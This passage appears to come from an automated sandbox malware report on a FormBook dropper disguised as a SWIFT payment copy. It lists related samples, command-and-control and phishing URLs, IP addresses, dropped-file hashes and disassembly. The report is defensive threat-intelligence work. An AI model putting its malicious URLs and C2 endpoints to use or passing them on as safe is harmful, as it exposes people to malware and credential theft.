                                                                                                                      • www.belaflorloja.online/udwf/?v6z=oFFL3vu9XQAr7FXjltLFbpbEr5FxsFP7HJzEKcO8nyy/m3ryRIKVTbJ4UDOYwgR5jk0ohOkqMmAoILSQFXP6MGzw8RbozNluwQ==&D0=jDf0H8hP4jC0e4
                                                                                                                      8YR4efs2RpFwopI.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.psiedithaguiar.online/cw88/?9Lm=HWW18yrCiVhSkE0OMDRGfA79TWqFd2fhwWhDLB4Nx1ta8ivjYzQ05WOv3dSX5++gMqQwwwOjuXoRvv9leLjaveeHksUcukXX8w==&y2i=vLUd-L
                                                                                                                      NrL5b0aqVD.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.alemdenos.online/g81o/?GdlLq=G6MtrBcXOrUtq&4LHX32=OEtZmuXM0/Cid7KotjLyS3tfsUIOFWfP78EXyu/aZd3PQ5FK/6cWWicvr5d1I7rfxCfvdTKfRKM62FaBDXIcFCSz4AMSB6wcJw==
                                                                                                                      October'23_Statement_of_Account.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.belaflorloja.online/udwf/?wBDPln=oFFL3vu9XQAr7FXg9tLvaYbPlZ5L8Wn7HJzEKcO8nyy/m3ryRIKVTbJ4UDOYwgR5jk0ohOkqMmAoILSQFXP7fgXauyzakeZHyA==&7jrL=CVJTXhj
                                                                                                                      207.244.126.150wlanext.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/
                                                                                                                      HSBC_Customer_Information.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?OXx=OPflBxUPCphXMp20&XLah9l3=9kePTKggf4eP6/DCHKgdnWln4uKoYRsxm+U+B1ESzIz+TmizgBdCe1eXOmqUrZ0x2YkFTu0erOvA47LCy4mEL/MRBTQYtxVXSsoBVZ4=
                                                                                                                      Pb1bUndg2D.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?nfexZ=P8d4wpDpRvETJR&7n=9kePTKggf4eP6/DFIrQNnhpCu/XQfyExm+U+B1ESzIz+TmizgBdCPgqxO0yXofox2ok8ePda98byur78zYrXL/U3LDwuqzk3b5g4OtBPtsbv
                                                                                                                      Quotation_package_RFQ_10750.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/
                                                                                                                      aMGTc878Pm.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?RJt=pBgxnLVH6&VHF=9kePTKggf4eP6/DCHLRWmSBnxOriYxsxm+U+B1ESzIz+TmizgBdCPgqxO0yXofox2ok8ePda98byur78zYrWFdkyLwYVqhYONQ==
                                                                                                                      8MlaKaB5fV.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?oT3HWl=9kePTKggf4eP6/DCHLRWmSBnxOriYxsxm+U+B1ESzIz+TmizgBdCPgqxO0yXofox2ok8ePda98byur78zYrWFdkyLwYVqhYONQ==&_lFx=FxBh
                                                                                                                      qWmFFs9EQd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • www.speedbikesglobal.com/m858/?Ob=89rK36yXGQSz/ZuO5GBulbqy8ps5vwPNemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyONbAuCwuDsFbw==&0DlPP=LVnH
                                                                                                                      q5yRKLZcqX.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?8Hwp60cP=9kePTKggf4eP6/DFIrQNnhpCu/XQfyExm+U+B1ESzIz+TmizgBdCPgqxO0yXofox2ok8ePda98byur78zYrXK/UiPCgroCk3Lg==&GZA=wvVL3b
                                                                                                                      Invoice_005241060.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                      • hoteldelcarmen.com.ar/tm5ahm.zip

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      www.greenharbor.infoDHL_Consignment_Details_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 69.57.161.215
                                                                                                                      Dhl_Consignment_details_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 69.57.161.215
                                                                                                                      gunzipped.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 69.57.161.215
                                                                                                                      qWmFFs9EQd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 69.57.161.215
                                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 69.57.161.215
                                                                                                                      www.lets-room.onlinePURCHASE_INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      qWmFFs9EQd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      U6SJBLxT2Z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      Document.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      www.medical-loan24.liveDHL_Receipt_AWB811471018477.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 64.190.62.22
                                                                                                                      DHL_#AWB811471048477.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 64.190.62.22
                                                                                                                      rDHLReceipt_8939977153.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 64.190.62.22
                                                                                                                      qWmFFs9EQd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 64.190.62.22
                                                                                                                      DHL_Receipt_#893915078.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 64.190.62.22
                                                                                                                      Maersk_K22TSI714881.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 64.190.62.22
                                                                                                                      DHL_Receipt_#9552756186.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 64.190.62.22

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      UNIFIEDLAYER-AS-1UShttps://www.evernote.com/shard/s360/sh/cb0c87b7-bc12-664e-4f2e-9f9869f3666f/HOx7Ff6NGWLvcPrgZqCUweAukbtLEoMc4UUNNBp3fJ3bi0hCeG88Iw4bKQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 108.179.232.88
                                                                                                                      Untitled attachment 00003.htmGet hashmaliciousUnknownBrowse
                                                                                                                      • 108.167.158.60
                                                                                                                      https://koesayangsayangedancok.com/myaccount/?key=fe1e1c2d7a267589233867d23b8e1ae911d07ebbGet hashmaliciousUnknownBrowse
                                                                                                                      • 162.240.155.1
                                                                                                                      https://gem.godaddy.com/signups/activate/MS0talpBQ0Zwb2kvQXFpdVpicjVwbEl6RTBJZmljTzVGSzZuVmlxTXRuckNKdTdiRXdZdkJWVXFqclREUkk4UmxzNy9XMXJSN0pwYlo0SnQrQUJNZjVUaVhvV2ovNDctLUR4SWQvakRySUF0YnRMUmMtLWVUQzlRd0d4WlAvVUxCWmovM0lRbFE9PQ==?signup=9180039Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 162.241.124.47
                                                                                                                      https://uhzwwzlwiyb2-1322892769.cos.ap-mumbai.myqcloud.com/uhzwwzlwiyb2.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 69.49.230.198
                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.7037.3815.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 50.87.139.143
                                                                                                                      Thank You for your interest.emlGet hashmaliciousUnknownBrowse
                                                                                                                      • 162.240.109.224
                                                                                                                      Revised_PO3923447.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 74.220.199.6
                                                                                                                      ATT00001.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 108.167.158.60
                                                                                                                      NEW_KSA-DUBAI_PROJECT_RFQ_DETAILS_#5688QM-988765RQ-ESPRIUS-DES-MWQTRRM.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 50.87.145.7
                                                                                                                      DOC_6653.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 50.6.138.90
                                                                                                                      https://muimomji.merceford.com.br/JBXRLNP4/bXBhcmFkaXNlQHdpY2tlcnNtaXRoLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                      • 108.179.193.59
                                                                                                                      SecuriteInfo.com.Trojan.Inject4.59820.14009.25482.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 162.241.169.155
                                                                                                                      krj2UH1P3A.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 192.185.216.61
                                                                                                                      krj2UH1P3A.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 192.185.216.61
                                                                                                                      pedido761396939049.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 50.6.138.90
                                                                                                                      RFQ_#_6000064879.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 162.144.239.6
                                                                                                                      https://docs.google.com/presentation/d/e/2PACX-1vQPPeBl4OJWocOx6H8XgquYKWbbwo-ylUypJqFt3WJKIF6Fwyj-u4rbp_o7Scs2vBZ9a-m63gUmy-zq/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 69.49.230.198
                                                                                                                      https://vincentmedina.com/cgi-bin/info/aksdkscndkvndkvndkvmdvkmdvv/akxmaskcacksdacnopcscmvcdkv/3847djcd/eavwrfbvmbozkrwsmqjvdgpaqiecmafxzbpvgltseyevnexlgy/Q2F0aGVyaW5lLkplbm5pbmdzQGFnZWRjYXJlcXVhbGl0eS5nb3YuYXUGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 192.185.16.143
                                                                                                                      https://p.feedblitz.com/t3.asp?/1081591/102442729/7821567_/~feeds.feedblitz.com/~/t/0/0/sethsblog/posts/~https://vincentmedina.com/cgi-bin/info/aksdkscndkvndkvndkvmdvkmdvv/akxmaskcacksdacnopcscmvcdkv/3847djcd/eavwrfbvmbozkrwsmqjvdgpaqiecmafxzbpvgltseyevnexlgy/Q2F0aGVyaW5lLkplbm5pbmdzQGFnZWRjYXJlcXVhbGl0eS5nb3YuYXU=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 192.185.16.143
                                                                                                                      OVHFRPGHPC-10-0033-FZB-001_I.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 142.44.226.116
                                                                                                                      https://pub-c8343f3be53b487e8c1e783ebc315cf5.r2.dev/index.htmlGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                      • 5.39.120.9
                                                                                                                      Debt-Payment_paper.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • 37.187.135.80
                                                                                                                      Debt-Payment_paper.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • 37.187.135.80
                                                                                                                      rQuotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      Halkbank_Ekstre_20231201_065805_508653.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      MRKU8781602.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      Purchase_Order_#PO30086.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      Signed_PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      PO_0206201.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      4wnssyl130.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                                                                      • 146.59.209.152
                                                                                                                      NEW_KSA-DUBAI_PROJECT_RFQ_DETAILS_#5688QM-988765RQ-ESPRIUS-DES-MWQTRRM.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 139.99.123.203
                                                                                                                      SSLTD.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 149.202.25.75
                                                                                                                      23021205_4534Documentation-PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      RFQ_#_6000064879.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 142.44.226.116
                                                                                                                      bntdUUqrfu.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 51.38.43.18
                                                                                                                      http://allomamandodo.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 213.186.33.24
                                                                                                                      bntdUUqrfu.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 51.38.43.18
                                                                                                                      https://sports.zaly.online/57724/Get hashmaliciousUnknownBrowse
                                                                                                                      • 147.135.71.152
                                                                                                                      LEASEWEB-USA-WDCUShttps://conexaoufo.com/en/salyut-7-space-angels-sighted-by-russian-cosmonauts/?fbclid=IwAR0M6Prz4YudFXb6qx6hSSNhDH_aQ50t8dMsDeG9zxGInfhVplAejrcwSlgGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.57
                                                                                                                      6iDFqoUZdJ.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                                                                      • 23.82.12.37
                                                                                                                      https://bsetsy.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 216.22.16.40
                                                                                                                      https://smbc-card.world/index/indexinfore.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.56
                                                                                                                      http://nerokolim.camGet hashmaliciousUnknownBrowse
                                                                                                                      • 192.96.203.13
                                                                                                                      Payment_Notification.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 23.82.12.31
                                                                                                                      wechat_XC560-1.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.151
                                                                                                                      Bntwfkvhnfruab.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • 23.82.12.35
                                                                                                                      https://taget.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.137
                                                                                                                      file.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                                                                      • 216.38.55.227
                                                                                                                      https://myaccount.dropsend.com/file/099c02133fa10997Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 192.96.202.199
                                                                                                                      Quotation_File_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • 23.82.12.35
                                                                                                                      8319.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 162.210.199.87
                                                                                                                      https://lazesoft.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.142
                                                                                                                      wlanext.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      HSBC_Customer_Information.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      https://arthurrlemus.wixsite.com/micr/officeGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.8
                                                                                                                      Pb1bUndg2D.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      Quotation_package_RFQ_10750.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      List_of_Items.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 23.82.12.30

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Temp\281B196J

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):196608
                                                                                                                      Entropy (8bit):1.1209886597424439
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\btpqr.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):168960
                                                                                                                      Entropy (8bit):6.43320077439248
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:5LaizcaUwmVsRIRRKbsg+/6mCl1Hq6J/l:5LZoaUTnRwHu+D9
                                                                                                                      MD5:51D987CA1642C555FB00D10AA35F8348
                                                                                                                      SHA1:475108E332234B36AD8491D6010C397B7EC6D0AE
                                                                                                                      SHA-256:7ECD102670B6CCAE894FF3C27551C3A97955C4CE883B6D770FC123B46BA00332
                                                                                                                      SHA-512:48CD80C476958B05EDD414378A8026318A2C40360E60FE7C9CFCE8897E4876FAC2B65AE58B1D250CF3242DE8E67E3A9E9E52161CC576A13FDBD58F4B15AC8858
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                      Reputation:low
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c..........O......O......O...x.....4..Bui....|......|......|......Rich...................PE..L.....qe............................M.............@..........................................................................`.......................................................................J..@...............$............................text............................... ..`.rdata..2...........................@..@.data....S...p...2...`..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\sabpw.vh

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):270849
                                                                                                                      Entropy (8bit):7.998703085386478
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:6144:0Z4g6Zi1VxUI9M8WYE3EYEOv5wgwymdFJi5+vM6shfV8b:0mgzxQYE3DEOBjKdFJiYDF
                                                                                                                      MD5:3EA668294E0F99D7BF4B0F665A1F9E65
                                                                                                                      SHA1:922DD86958DCEFCA6A3FBF311B7FEEE1AC8F3811
                                                                                                                      SHA-256:0BADC2B358299E411E0A31B21F7FB62D4D35C069332C0F35E010DE116B6E5CA9
                                                                                                                      SHA-512:54AD6632FD6526AAE3C025E2CA2C954F64623B9C655DBABF4210F4ECB944BED1F475BB0B326B9957CACC04C1874C323697847B5660A30520288098B3C321F0E3
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:..&.mM.yYC.. .3rs.......Y....a......B.?.a9.+!...L........4.B...*..{l...%.b.]...]..E....`..4.FP...g%I..k.1..X.t..p>.....U.&..\..L...}..|.._E]..M^...$..^.z...A4M..B2..4.......@w:z.p..\...y.....6l.. dH5_.!..if.8..H.(._........F.G:...GH3..k...o..W...I..M.yY~..n.g....-0.....G.a.....B.?.a9.+!...L........4.Bp..I.r.&.`.Y....%MP.[p..W....S{".Ek.!.M.b..../....V..F....U.&..1...)..@w.....M..w+.3..../..j|O.V.c.T..l........@wX..p$Y...N.....6l..Ld.4.....;...8..H.(..........IG:...G.3......o..W..L.I..M.yYR3..g....-....8....a......B.?.a9.+!...L........4.Bp..I.r.&.`.Y....%MP.[p..W....S{".Ek.!.M.b..../....V..F....U.&..1...)..@w.....M..w+.3..../..j|O.V.c.T..l........@wz|.p$..........6l..Ld.4....;.f.8..H.(..........IG:...G.3......o..W..L.I..M.yYR3..g....-....8....a......B.?.a9.+!...L........4.Bp..I.r.&.`.Y....%MP.[p..W....S{".Ek.!.M.b..../....V..F....U.&..1...)..@w.....M..w+.3..../..j|O.V.c.T..l........@wz|.p$..........6l..Ld.4....;.f.8..H.(........

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):7.957047282988841
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      File size:390'725 bytes
                                                                                                                      MD5:1827b46843b0cf4502a0c0395914842d
                                                                                                                      SHA1:4af6143d665e11ef138534c1f803ec7531a07d4d
                                                                                                                      SHA256:50a40c6d5d6f716a1af1ff170aa99c4c0a21271995d5d14817f9955aabd6aa67
                                                                                                                      SHA512:51dd133f82332461b1c1dd1bdc5925ed344cc82842ba4b99b0f65c664331d83b0a503d346848c75c26344223a47dee59169b5436a20428aa12983b5edead1620
                                                                                                                      SSDEEP:6144:P8LxBiZcMlUI2MvWhE3EPEOv5/gwymdFJi5+8KzpWxUUn51ixB9HYbHp:DFlAhE3mEOBoKdFJi2zpWx151EXHAHp
                                                                                                                      TLSH:2684230BAAC22ABEF0D246B05BAB87B5F77B51050441BA57CB503D7D24729C7B7063B8
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                                                                                                      File Icon

                                                                                                                      Icon Hash:3d2e0f95332b3399

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x40312a
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      sub esp, 00000184h
                                                                                                                      push ebx
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      xor ebx, ebx
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [esp+20h], ebx
                                                                                                                      mov dword ptr [esp+14h], 00409168h
                                                                                                                      mov dword ptr [esp+1Ch], ebx
                                                                                                                      mov byte ptr [esp+18h], 00000020h
                                                                                                                      call dword ptr [004070B0h]
                                                                                                                      call dword ptr [004070ACh]
                                                                                                                      cmp ax, 00000006h
                                                                                                                      je 00007F97F06C34C3h
                                                                                                                      push ebx
                                                                                                                      call 00007F97F06C62A4h
                                                                                                                      cmp eax, ebx
                                                                                                                      je 00007F97F06C34B9h
                                                                                                                      push 00000C00h
                                                                                                                      call eax
                                                                                                                      mov esi, 00407280h
                                                                                                                      push esi
                                                                                                                      call 00007F97F06C6220h
                                                                                                                      push esi
                                                                                                                      call dword ptr [00407108h]
                                                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                                                      cmp byte ptr [esi], bl
                                                                                                                      jne 00007F97F06C349Dh
                                                                                                                      push 0000000Dh
                                                                                                                      call 00007F97F06C6278h
                                                                                                                      push 0000000Bh
                                                                                                                      call 00007F97F06C6271h
                                                                                                                      mov dword ptr [0042EC24h], eax
                                                                                                                      call dword ptr [00407038h]
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040726Ch]
                                                                                                                      mov dword ptr [0042ECD8h], eax
                                                                                                                      push ebx
                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                      push 00000160h
                                                                                                                      push eax
                                                                                                                      push ebx
                                                                                                                      push 00429058h
                                                                                                                      call dword ptr [0040715Ch]
                                                                                                                      push 0040915Ch
                                                                                                                      push 0042E420h
                                                                                                                      call 00007F97F06C5EA4h
                                                                                                                      call dword ptr [0040710Ch]
                                                                                                                      mov ebp, 00434000h
                                                                                                                      push eax
                                                                                                                      push ebp
                                                                                                                      call 00007F97F06C5E92h
                                                                                                                      push ebx
                                                                                                                      call dword ptr [00407144h]

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000xbe8.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x5e660x6000False0.6705729166666666data6.440655734359132IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x70000x12a20x1400False0.4455078125data5.058328787102383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x90000x25d180x600False0.458984375data4.18773476617059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x370000xbe80xc00False0.4505208333333333data4.364570615142666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0x371d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                      RT_DIALOG0x374c00x100dataEnglishUnited States0.5234375
                                                                                                                      RT_DIALOG0x375c00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                      RT_DIALOG0x376e00x60dataEnglishUnited States0.7291666666666666
                                                                                                                      RT_GROUP_ICON0x377400x14dataEnglishUnited States1.2
                                                                                                                      RT_VERSION0x377580x1bcdataEnglishUnited States0.5135135135135135
                                                                                                                      RT_MANIFEST0x379180x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States0.5656424581005587

                                                                                                                      Imports

                                                                                                                      DLLImport
